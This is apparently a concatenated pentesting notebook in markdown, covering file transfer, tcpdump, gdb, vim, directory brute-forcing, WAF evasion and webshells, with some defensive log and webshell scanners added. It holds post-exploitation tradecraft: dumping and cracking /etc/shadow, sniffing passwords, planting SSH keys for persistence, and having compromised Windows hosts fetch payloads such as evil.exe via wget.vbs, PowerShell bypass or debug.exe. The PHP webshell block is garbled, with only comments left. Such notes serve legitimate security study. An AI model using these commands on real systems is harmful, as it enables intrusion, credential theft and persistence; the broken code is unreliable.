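        # Decode %xx and '+' so encoded payloads match the same rules as plain ones.
        query = unquote_plus(m.group("path").partition("?")[2])
        status = int(m.group("status"))
        for name, pattern in RULES:
            if pattern is None:
                # Step 1 on this page: a lone quote that breaks the query shows up as a 5xx.
                hit = "'" in query and status >= 500
            else:
                hit = pattern.search(query) is not None
            if hit:
                findings.append((m.group("ip"), m.group("ts"), name, query))
    return findings


def count_by_ip(findings):
    """Count hits per source IP; one client walking through the steps in order stands out."""
    counts = {}
    for ip, _, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for ip, ts, rule, query in hits:
        print(f"{ts} {ip} {rule}: {query}")
    print(count_by_ip(hits))
```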

## References

http://resources.infosecinstitute.com/sql-truncation-attack/
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
http://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/

--------------------------------------------------------------------------------
/ssl-strip.md:
--------------------------------------------------------------------------------
# SSL-strip

If the user you are intercepting is communicating over HTTPS your interception will trigger an alert every time the user tries to enter an https-page. This is not what we want. In order to bypass this we can remove the ssl-part of every request. It is less likely that the user will notice a change from HTTPS to HTTP in the url-bar.

## Reference
Penetration Testing - A hands on introduction to hacking. Page 174

--------------------------------------------------------------------------------
/styles/ebook.css:
--------------------------------------------------------------------------------
/* CSS for ebook */

--------------------------------------------------------------------------------
/styles/print.css:
--------------------------------------------------------------------------------
/* CSS for print */

--------------------------------------------------------------------------------
/styles/website.css:
--------------------------------------------------------------------------------
.markdown-section pre {
    background-color: #ddd;
}

.markdown-section code {
    background-color: #ddd;
}

--------------------------------------------------------------------------------
/subdomain_takeover.md:
--------------------------------------------------------------------------------
# Subdomain Takeover

This is a really cool attack.

First you look for all subdomains.
Sometimes a company has forgotten about a subdomain, like an old support system called `support.example.com`. Then the support-system that the domain points to gets removed. That means that we could start a service for support and link it to that domain, thereby controlling the domain.

HackerOne reports

https://hackerone.com/reports/114134
https://hackerone.com/reports/109699

https://blog.getwhitehats.com/being-a-developer-can-be-a-stressful-job-following-the-request-of-your-employer-creating-website-e96af56e51c3#.t3tqd5s0n
http://yassineaboukir.com/blog/neglected-dns-records-exploited-to-takeover-subdomains/
https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/

--------------------------------------------------------------------------------
/tcp-dumps_on_pwnd_machines.md:
--------------------------------------------------------------------------------
# Loot Linux

## Passwords and hashes

First grab the passwd and shadow file.

```bash
cat /etc/passwd
cat /etc/shadow
```

We can crack the passwords using `john the ripper` like this:

```
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```

## Interesting files

```
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

.ssh:
.bash_history
```

## Mail

```
/var/mail
/var/spool/mail
```

## Tcp-dump

Fast commands:

```
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
```

First we need to figure out what interfaces the machine is using: `ifconfig`. Then we can just start tapping in on that interface and capture those packets.

### Commands and flags

Let's start with the basics.
`tcpdump` - this command will output all network traffic straight to the terminal. Might be hard to understand if there is a lot of traffic.

`-A` - stands for ASCII, and outputs the packets in ASCII.

`-w file.pcap` - the w-flag will save the output into the filename of your choice. The traffic is stored in pcap-format, which is the standard packet-analysis format.

`-i any` - will capture traffic for all interfaces.

`-D` - show list of all interfaces

`-q` - be less verbose. Be more `quiet`

`-s` - The default size that tcpdump captures is only 96 bytes. If you want it to capture more you have to define it yourself; `-s0` gives you the whole packet.

`-c` - count. Set how many packets you want to intercept, and then stop.
This is useful if you have a non-interactive shell; this way you can capture packets without having to exit with `ctrl-c`.

`port 22` - only see traffic on a specific port.

`-vvv` - Verbose. Depending on how verbose you want the output.

### Useful commands

Lots of good stuff here
http://www.rationallyparanoid.com/articles/tcpdump.html

```
tcpdump -i wlan0 -vvv -A | grep "GET"
```
This will grep all GET requests from the wlan0 interface.
This will not get any SSL-encrypted traffic.

```
sudo tcpdump -i wlan0 src port 80 or dst port 80 -w port-80-recording.pcap
sudo tcpdump -i eth0 src port 80 or dst port 80 -w port-80-recording.pcap
```

Print the traffic in hex with ascii interpretation.

```
tcpdump -nX -r file.pcap
```

Only record tcp-traffic

```
tcpdump tcp -w file.pcap
```

### Sniffing for passwords

Once we have dumped some of the traffic we can load it into metasploit and run `psnuffle` on it. It can sniff passwords and usernames from **pop3**, **imap**, **ftp**, and **HTTP GET**. This is a really easy way to find usernames and passwords from traffic that you have already dumped, or are in the process of dumping.

```
use auxiliary/sniffer/psnuffle
```

https://www.offensive-security.com/metasploit-unleashed/password-sniffing/

## References

http://www.thegeekstuff.com/2010/08/tcpdump-command-examples/

https://danielmiessler.com/study/tcpdump/

https://www.sans.org/reading-room/whitepapers/testing/post-exploitation-metasploit-pivot-port-33909

http://jvns.ca/blog/2016/03/16/tcpdump-is-amazing/

--------------------------------------------------------------------------------
/text-injection.md:
--------------------------------------------------------------------------------
# Text/content-injection

Relevant hackerone reports:
https://hackerone.com/reports/145853

https://www.owasp.org/index.php/Content_Spoofing

--------------------------------------------------------------------------------
/the_basics.md:
--------------------------------------------------------------------------------
# The Basics

In this chapter we will look at some basics, good stuff to know before we begin: the basics of how Windows works and the basics of Linux.

It is also pretty useful to know how to cook together a simple bash-script, so we are going to look at some really simple bash operations.

And a little bit about PowerShell and the Windows command line. PowerShell is becoming more and more important as a tool for hackers, so this chapter will probably keep expanding.

Python is also the hacker's friend, so I have included a little bit about some basic operations with python.

Transferring files is also pretty fundamental. It could be placed in the post-exploit chapter, but I think it fits better here since it is necessary for any work between different machines.

Vim is another thing that you can't live without.
You can use it as your main editor for writing and editing code or notes, but even if you don't use it as your main editor you still need to know the basics of it in order to be able to edit files on your hacked machines.

--------------------------------------------------------------------------------
/tips.md:
--------------------------------------------------------------------------------
# Tips

- Whenever you find a service always make sure you know if it is vulnerable or not. Be it ssh, ftp, server, front-end library or framework. An unpatched ssh-client can count as a bug in a bug bounty program.

For example, see this bug report:
https://hackerone.com/reports/139940

--------------------------------------------------------------------------------
/tools.md:
--------------------------------------------------------------------------------
# Tools

These are our tools:
- ltrace
- strings
- file
- objdump
- gdb

This is a great little trick. If you are working a lot with hexadecimal and you want to easily convert it to ascii you can write this in bash
```
echo 6a6548 | xxd -r -p
```
will print out: **jeH**
xxd is a program that makes hexdumps out of ascii; with the -r flag we can reverse it.

## Nasm to opcode

If we want to convert an assembly instruction to opcode we can use this tool

```
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

nasm > JMP ESP
00000000  FFE4              jmp esp
```

## Objdump
Objdump is a program that outputs the assembly code of a compiled program. It can be executed like this.
example:
```
objdump -D myProgram
objdump -M intel -d program_name    ;This is to read the assembly in intel-syntax
```

## GDB - GNU Debugger

### Setting breakpoints
Sometimes you want the debugger to stop at a certain point in the program, so that you can investigate memory and such. We can set these breakpoints with the following command:

Set a break at the main-function
```
break main
```

Set a break at that line. I think it is set before the line is executed.
```
break 10
```

**Show breakpoints**
If you want to know which breakpoints you have set you can run:
```
info breakpoint
info break
info b
```

**Remove breakpoints**
Will delete all breakpoints on line 9
```
clear 9
```

Run the program
```
run
```

Show code
```
list         ; show code if you have compiled it with the -g flag
list 10      ; will show the code around line 10: five lines before, and five lines after.
list 1,20    ; will list all lines between the numbers.
```

This shows the code in assembly. It is pretty much the same as running objdump.
```
disassemble main
```

Show info about the instruction pointer
```
info register eip
i r eip
```
On 64-bit machines it is called `rip` instead of `eip`. It basically shows which address eip is pointing at. So the output might be something like this:
```
(gdb) i r rip
rip            0x4004aa            0x4004aa
```
Which means that rip at this moment is pointing at 0x4004aa, which means that this is going to be the next instruction that gets executed.

The structure is like this:
```
examine/[format] address
x/
```

Format is how you want to display the memory.
Here are the available formats:
```
o - octal
x - hexadecimal
d - decimal
u - unsigned decimal
t - binary
f - floating point
a - address
c - char
s - string
i - instruction
```

Example:
```
x/s myVariable
```
This means: examine myVariable, and output the content of that memory in the form of a string.
Now this does not work for values that do not have a memory address. It will just give you
```
0x16: Cannot access memory at address 0x16
```
That is because the variable is not a pointer (it does not point to a memory-address), but instead it is a hardcoded value.

```
x/i $rip
```
Examine/info instruction pointer register. This command can be used to examine a specific part of memory. In this example it was the instruction pointer, but it can also be a specific address in memory.

### Show all functions

```
info functions
```

**Python**
Python can be quite useful to generate strings as input. Of course this can be done with a lot of other languages. It would work like this:
```
./myProgram $(python -c 'print "\x41" * 30')
```
Basically, the `$(python ...)` creates a subshell within our command, and in that subshell we run the normal python command. The `-c` flag tells python that we are going to run a command instead of opening up the interactive shell.
You can test this in the terminal like this:
```
$ python -c 'print "hello" * 100'
hellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohello
```

#### GCC
Compile the program in debug mode, so that the debugger has access to the source code.
```
gcc -g program.c
```

--------------------------------------------------------------------------------
/tools_of_the_trade.md:
--------------------------------------------------------------------------------
# Tools of the trade

Here is just a collection of some tools that I use that I want to have an easy manual for.

--------------------------------------------------------------------------------
/transfering_files.md:
--------------------------------------------------------------------------------
# Transferring Files on Linux

## Set Up a Simple Python Webserver

For the examples using `curl` and `wget` we need to download from a web-server. This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

```
python -m SimpleHTTPServer 9999
```

## Wget

You can download files using `wget` like this:

```
wget 192.168.1.102:9999/file.txt
```

## Curl

```
curl -O http://192.168.0.101/file.txt
```

## Netcat

Another easy way to transfer files is by using netcat.

If you can't have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. Then you are left hanging and can't do `ctrl-c` because that would kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

```bash
nc -lvp 4444 < file
```

On target machine:

```bash
nc 192.168.1.102 4444 > file
```

You can of course also do it the risky way, the other way around:

So on the victim-machine we run `nc` like this:

```bash
nc -lvp 3333 > enum.sh
```

And on the attacking machine we send the file like this (the port must match the listener above):

```bash
nc 192.168.1.103 3333 < enum.sh
```

I have sometimes received this error:

```
This is nc from the netcat-openbsd package. An alternative nc is available
```

I have just run this command instead:

```
nc -l 1234 > file.sh
```

## With php

```
echo "" > down2.php
```

## Ftp

If you have access to an ftp-client you can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

## Tftp

On some rare machines we do not have access to `nc` and `wget`, or `curl`. But we might have access to `tftp`. Some versions of `tftp` are run interactively, like this:

```
$ tftp 192.168.0.101
tftp> get myfile.txt
```

If we can't run it interactively, for whatever reason, we can do this trick:

```
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
```

### SSH - SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh.
This might give you a better shell and more stability, and all the other features of SSH, like transferring files.

So, in the `/home/user` directory you can find the hidden `.ssh` files by typing `ls -la`.
Then you need to do the following.

1. Create a new keypair

You do that with:

```
ssh-keygen -t rsa -C "your_email@example.com"
```

then you enter a name for the key.

```
Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
```

This will create two files, one called `nameOfMyKey` and another called `nameOfMyKey.pub`. The one with the `.pub` is of course your public key, and the other key is your private one.

2. Add your public key to authorized_keys.

Now you copy the content of `nameOfMyKey.pub`.
On the compromised machine you go to `~/.ssh` and then append the public key to the file authorized_keys, like this (`>>` appends, so existing keys in the file are kept):

```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." >> authorized_keys
```

3. Log in.

Now you should be all set to log in using your private key, like this:

```
ssh -i nameOfMyKey kim@192.168.1.103
```

### SCP

Now we can copy files to a machine using `scp`

```
# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination
```

--------------------------------------------------------------------------------
/transfering_files2.md:
--------------------------------------------------------------------------------
# Transferring Files

This section could easily be put in the post-exploitation section.
But I consider this knowledge so fundamental that I chose to put it here.

--------------------------------------------------------------------------------
/transfering_files_to_windows.md:
--------------------------------------------------------------------------------
# Transferring Files to Windows

Transferring files to Linux is usually pretty easy. We can use `netcat`, `wget`, or `curl`, which most systems have by default. But Windows does not have these tools.

## FTP

Most Windows machines have an ftp-client included. But we can't use it interactively since that would most likely kill our shell, so we have to get around that. We can however run commands from a file. So what we want to do is to echo the commands into a textfile and then use that as the input to the ftp-client. Let me demonstrate.

On the compromised machine we echo the following commands into a file (note the space before `>` on the first line: cmd.exe reads `21>` as a handle redirection and would drop the port number)

```
echo open 192.168.1.101 21 > ftp.txt
echo USER asshat>> ftp.txt
echo mysecretpassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt
```

Then run this command to connect to the ftp

```
ftp -v -n -s:ftp.txt
```

Of course you need to have an ftp-server configured with the user asshat and the password mysecretpassword.

## TFTP

Works by default on:

**Windows XP**

**Windows 2003**

A TFTP client is installed by default on Windows machines up to Windows XP and Windows 2003. What is good about TFTP is that you can use it non-interactively, which means less risk of losing your shell.

Kali has a TFTP server built in.
You can serve up some files with it like this

```
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
```

Now you can put stuff in `/srv/tftp` and it will be served. Remember that TFTP uses UDP.
So if you run `netstat` it will not show it as listening.

You can see it running like this (list the UDP sockets and look for port 69):

```
netstat -anu | grep ':69'
```

So now you can upload and download whatever you need from the Windows machine like this:

```
tftp -i 192.160.1.101 GET wget.exe
```

If you want to test that the TFTP server is working you can test it from Linux; I don't think the Linux client has a non-interactive mode.

```
tftp 192.160.1.101
GET test.txt
```

I usually put all files I want to make available in `/srv/tftp`.

If you want to make sure that the file was uploaded correctly you can check the syslog. Grep for the IP like this:

`grep 192.168.1.101 /var/log/syslog`

## VBScript

Here is a good script to make a wget clone in VBScript.

If it doesn't work, try piping it through `unix2dos` before copying it.

```
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

You then execute the script like this:

```
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
```

## PowerShell

This is how we can download a file using PowerShell. Remember, since we only have a non-interactive shell we cannot start `PowerShell.exe` directly, because our shell can't handle that. But we can get around that by creating a PowerShell script and then executing the script:

```
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.1.101/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

Now we invoke it with this crazy syntax:

```powershell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```

## Debug.exe

This is a crazy technique that works on 32-bit Windows machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger, but it can also rebuild them from hex. So the idea is that we take a binary, like `netcat`, convert it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.

`Debug.exe` can only assemble 64 kb, so we need to use files smaller than that. We can use upx to compress it even more.
So let's do that:

```
upx -9 nc.exe
```

Now it only weighs 29 kb. Perfect. So now let's convert it to hex:

```
wine exe2bat.exe nc.exe nc.txt
```

Now we just copy-paste the text into our Windows shell, and it will automatically create a file called `nc.exe`.

--------------------------------------------------------------------------------
/users.md:
--------------------------------------------------------------------------------

# Users

social-searcher.com

Reddit
Snoopsnoo

--------------------------------------------------------------------------------
/vim.md:
--------------------------------------------------------------------------------

# Vim

[http://www.viemu.com/a-why-vi-vim.html](http://www.viemu.com/a-why-vi-vim.html)
And also this classic answer: [https://stackoverflow.com/questions/1218390/what-is-your-most-productive-shortcut-with-vim](https://stackoverflow.com/questions/1218390/what-is-your-most-productive-shortcut-with-vim)

## Core concepts

In vim you have the concept of buffers.

```bash
# List buffers
:buffers

# Switch buffer
# By number
:b1
:b2
# By name
:b [name]

# Close/delete a buffer
:bdelete
:bd
```

## Movement - Motion commands

**Left, up, down, right**

`hjkl`

**start of line**

`0` (zero)

**end of line**

`$`

**beginning of next word**

`w`

**beginning of next word, defined by white space**

`W`

**end of the next word**

`e`

**end of the next word, defined by white space**

`E`

**back to the beginning of previous word**

`b`

**back to the end of previous word**

`B`

**go to next character of your choice**

If you want to go to the next comma:

`f,`

**start of file**

`gg`

**end of file**

`G`

## Operators

Operators are commands that do things, like delete, change or copy.

`c` - change
`ce` - change until end of the word.
`c$` - change until end of line.

## Combining Motions and Operators

Now that you know some motion commands and operator commands, you can start combining them.

`dw` - delete word
`d$` - delete to the end of the line

## Count - Numbers

You can add numbers before motion commands to move faster.

`4w` - move cursor three words forward
`0` - move cursor to the start of the line

You can also use numbers to perform operations.
`d3w` - delete three words

`3dd` - delete three lines

## Replace

If you need to replace a character, there is no need to enter insert mode. You can just use replace.

Go to a character and then press `r` followed by the character you want instead.

`rp` if you want to replace p.

`R`

## Clipboard

In order to copy something FROM vim to the OS clipboard you can do this:

The `"` means that we are now entering a register, and the `*` means the OS clipboard. So we are yanking something and putting it in the OS clipboard register.

```
"*y
```

## Substitute - Search and replace

```
:s/thee/the/g
```

## Entering insert-mode

`i` - current character
`o` - next line
`O` - line before
`a` - end of word
`A` - end of line

## .vimrc

This file holds all your vim configuration.

## Plugins

Install Vundle from here:
[https://github.com/VundleVim/Vundle.vim](https://github.com/VundleVim/Vundle.vim)

**Add plugin**

Add the plugin to your `.vimrc` file, then open vim and write:

`:PluginInstall`

--------------------------------------------------------------------------------
/vulnerabilities.md:
--------------------------------------------------------------------------------

# Vulnerabilities

There are a number of different common vulnerabilities that are found in binaries. In this chapter we are going to discuss some of the common ones.

The main idea behind these exploits is to corrupt the memory allocation to inject arbitrary code that gets executed by the program.

--------------------------------------------------------------------------------
/vulnerability_analysi.md:
--------------------------------------------------------------------------------

# Vulnerability analysis

--------------------------------------------------------------------------------
/vulnerability_analysi1s.md:
--------------------------------------------------------------------------------

# Vulnerability analysis

So now you have done your recon and found services and their versions.
You have looked in every corner of the target: enumerated subdomains, scanned them, browsed through the web pages looking everywhere.

So, now it is time to see if any of these services contain any vulnerabilities.

--------------------------------------------------------------------------------
/vulnerability_analysis.md:
--------------------------------------------------------------------------------

# Vulnerability analysis

--------------------------------------------------------------------------------
/waf_-_web_application_firewall.md:
--------------------------------------------------------------------------------

# WAF - Web application firewall

One of the first things we should do when starting to poke at a website is to see what WAF it has.

## Identify the WAF

```
wafw00f http://example.com
```

http://securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html

--------------------------------------------------------------------------------
/web-scanning.md:
--------------------------------------------------------------------------------

# Find hidden files and directories

## TLDR

```
# Dirb
dirb https://192.168.1.101

# Gobuster - remove relevant response codes (403 for example)
gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```

## About

There is essentially no way for a user to know which files are found in which directories on a web server, unless the whole server has directory listing on by default. However, if you go directly to the page it will be shown. So what the attacker can do is brute-force hidden files and directories: just test a bunch of them. There are several tools for doing this. The attack is of course very noisy and will show up fast in the logs.
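As an added defender-side example (not part of the original guide), here is what that noise looks like from the server: the script parses combined-format access log lines and flags any client that produces many 404/403 responses for distinct paths within a few seconds, the signature of dirb/gobuster-style forced browsing. The log lines, the `192.168.1.50` scanner address and the threshold values are constructed sample data.

```python
# Added example (not from the original guide): flag forced-browse scans in an
# Apache/nginx combined-format access log by counting 404/403 responses for
# distinct paths per client inside a sliding time window.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: a wordlist scan from 192.168.1.50 mixed with ordinary traffic.
SAMPLE_LOG = """\
192.168.1.20 - - [10/Oct/2016:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326
192.168.1.50 - - [10/Oct/2016:13:55:37 +0000] "GET /admin HTTP/1.1" 404 209
192.168.1.50 - - [10/Oct/2016:13:55:37 +0000] "GET /backup HTTP/1.1" 404 209
192.168.1.50 - - [10/Oct/2016:13:55:37 +0000] "GET /cgi-bin HTTP/1.1" 403 199
192.168.1.50 - - [10/Oct/2016:13:55:38 +0000] "GET /config HTTP/1.1" 404 209
192.168.1.50 - - [10/Oct/2016:13:55:38 +0000] "GET /db HTTP/1.1" 404 209
192.168.1.50 - - [10/Oct/2016:13:55:38 +0000] "GET /dev HTTP/1.1" 404 209
192.168.1.50 - - [10/Oct/2016:13:55:39 +0000] "GET /old HTTP/1.1" 404 209
192.168.1.50 - - [10/Oct/2016:13:55:39 +0000] "GET /test HTTP/1.1" 404 209
192.168.1.50 - - [10/Oct/2016:13:55:39 +0000] "GET /tmp HTTP/1.1" 404 209
192.168.1.20 - - [10/Oct/2016:13:55:40 +0000] "GET /favicon.ico HTTP/1.1" 404 209
192.168.1.20 - - [10/Oct/2016:13:56:10 +0000] "GET /about.html HTTP/1.1" 200 1200
"""


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TIME_FMT)
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def find_scanners(log_text, threshold=5, window_seconds=10, miss_codes=(403, 404)):
    """Return {ip: distinct_missing_paths} for every client that produced at
    least `threshold` miss responses for distinct paths within `window_seconds`.

    403 counts as a miss too: the guide's WAF section notes that a WAF or a
    directory ACL turns the expected 404s of a brute-force into 403s.
    """
    windows = defaultdict(deque)   # ip -> deque of (timestamp, path) misses
    flagged = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, status = parsed
        if status not in miss_codes:
            continue
        q = windows[ip]
        q.append((ts, path))
        # Drop misses older than the window, so one stray 404 a minute never trips it.
        while q and ts - q[0][0] > timedelta(seconds=window_seconds):
            q.popleft()
        distinct = {p for _, p in q}
        if len(distinct) >= threshold:
            flagged[ip] = max(len(distinct), flagged.get(ip, 0))
    return flagged


if __name__ == "__main__":
    for ip, n in find_scanners(SAMPLE_LOG).items():
        print(f"{ip}: {n} distinct missing paths inside a 10 s window, likely forced browsing")
```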

### Dirb

This is a really easy tool to use:

```
dirb http://target.com
```

### Dirbuster

It is a GUI.
You start it with:

```
dirbuster
```

### OWASP ZAP

Insert your target.
Add it to the context.
Click the plus sign.
Click on Forced Browse.

### Wfuzz

You can find the manual by typing:

```
wfuzz -h
```

```
wfuzz -c -z file,/root/.ZAP/fuzzers/dirbuster/directory-list-2.3-big.txt --sc 200 http://pegasus.dev:8088/FUZZ.php
```

### Gobuster

```
# Gobuster - remove relevant response codes (403 for example)
gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```

## WAF - Web application firewall

It might be that dirb shows you 403 errors instead of the expected 404. This might mean that there is a WAF protecting the site. To get around it we might have to change our request header so it looks more like a normal request:

```
dirb http://target.com -a "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36"
```

--------------------------------------------------------------------------------
/web-services.md:
--------------------------------------------------------------------------------

# Web-services

Vulnerabilities on the web can lead to many different kinds of attacks. They can be used to get access to another user's data, or work as a step towards remote code execution.

A great way to see real examples of a specific attack is to search hackerone.com through Google like this:

```
site:hackerone.com clickjacking
```

## Visit OWASP top 10

This chapter is largely based on the OWASP top 10 vulnerabilities.
So if you want a better explanation just check out their website:
https://www.owasp.org/index.php/Top_10_2013-Top_10

--------------------------------------------------------------------------------
/webshell.md:
--------------------------------------------------------------------------------

# Webshell

A webshell is a shell that you can access through the web. This is useful when you are up against firewalls that filter outgoing traffic on ports other than port 80. As long as you have a web server and want it to function, you can't filter out traffic on port 80 (and 443). It is also a bit more stealthy than a reverse shell on other ports, since the traffic is hidden in the HTTP traffic.

You have access to different kinds of webshells on Kali here:

```
/usr/share/webshells
```

## PHP

This code can be injected into pages that use PHP.

```php
# Execute one command

# Take input from the url parameter. shell.php?cmd=whoami

# The same but using passthru

# For shell_exec to output the result you need to echo it

# Exec() does not output the result without echo, and only outputs the last line. So not very useful!

# Instead do this if you can. It will return the output as an array, and then print it all.

# preg_replace(). This is a cool trick

# Using backticks
$output"; ?>

# Using backticks
```

You can then execute the commands like this:

```
http://192.168.1.103/index.php?cmd=pwd
```

### Make it stealthy

We can make the commands from above a bit more stealthy. Instead of passing the commands through the URL, which will be obvious in logs, we can pass them through other header parameters. Then use Tamper Data or Burp Suite to insert the commands, or just netcat or curl.
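As an added example from the defensive side (not from the original guide), the scanner below looks for exactly these one-liner patterns in PHP source: a command-execution function fed from `$_GET`/`$_POST`/a request header in `$_SERVER`, backtick execution of a variable, and `eval`/`assert` combined with the obfuscation helpers this page lists. The file contents are constructed samples; the function lists are the ones named on this page plus `popen`, `proc_open` and `gzinflate`, which I added as their standard PHP siblings.

```python
# Added example (not from the original guide): a small static scanner that
# flags PHP source in which command execution is driven by request input,
# the pattern of the one-liner webshells discussed on this page.
import re

# Functions this page uses for running commands (plus popen/proc_open, added here)
# and for hiding the code (plus gzinflate, the counterpart of gzdeflate).
EXEC_FUNCS = ("system", "passthru", "shell_exec", "exec", "popen", "proc_open")
OBFUSCATION_FUNCS = ("eval", "assert", "base64_decode", "gzinflate", "gzdeflate", "str_rot13")

# Request-controlled input: URL/POST params, cookies, and any request header,
# which PHP exposes as $_SERVER['HTTP_<NAME>'] (the "stealthy" variant above).
REQUEST_INPUT = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[|\$_SERVER\s*\[\s*['\"]HTTP_", re.I
)


def _call_re(names):
    return re.compile(r"\b(" + "|".join(names) + r")\s*\(", re.I)


EXEC_CALL = _call_re(EXEC_FUNCS)
OBF_CALL = _call_re(OBFUSCATION_FUNCS)
EVAL_CALL = re.compile(r"\b(eval|assert)\s*\(", re.I)
BACKTICKS = re.compile(r"`[^`]*\$[^`]*`")     # `$cmd` style execution


def scan_php(source):
    """Return [(line_no, reason), ...] for one PHP source text.

    Reasons:
      exec-from-request  command function on the same line as request input
      backtick-exec      backtick execution whose command contains a variable
      obfuscated-eval    obfuscation helper around request input or around eval/assert
    """
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        tainted = REQUEST_INPUT.search(line) is not None
        if EXEC_CALL.search(line) and tainted:
            findings.append((no, "exec-from-request"))
        if BACKTICKS.search(line):
            findings.append((no, "backtick-exec"))
        if OBF_CALL.search(line) and (tainted or EVAL_CALL.search(line)):
            findings.append((no, "obfuscated-eval"))
    return findings


def scan_files(files):
    """files: {path: source}. Return only the paths that have findings."""
    result = {}
    for path, src in files.items():
        hits = scan_php(src)
        if hits:
            result[path] = hits
    return result


# Constructed samples: two suspicious files and one benign one.
SAMPLE_FILES = {
    "uploads/shell.php": '<?php system($_GET["cmd"]); ?>\n',
    "inc/helper.php": (
        '<?php\n'
        '$c = $_SERVER["HTTP_X_CMD"];\n'        # command carried in a request header
        'echo `$c`;\n'
        'eval(base64_decode($_POST["p"]));\n'
    ),
    "lib/clean.php": '<?php echo htmlspecialchars($_GET["name"]); ?>\n',
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for no, reason in hits:
            print(f"{path}:{no}: {reason}")
```

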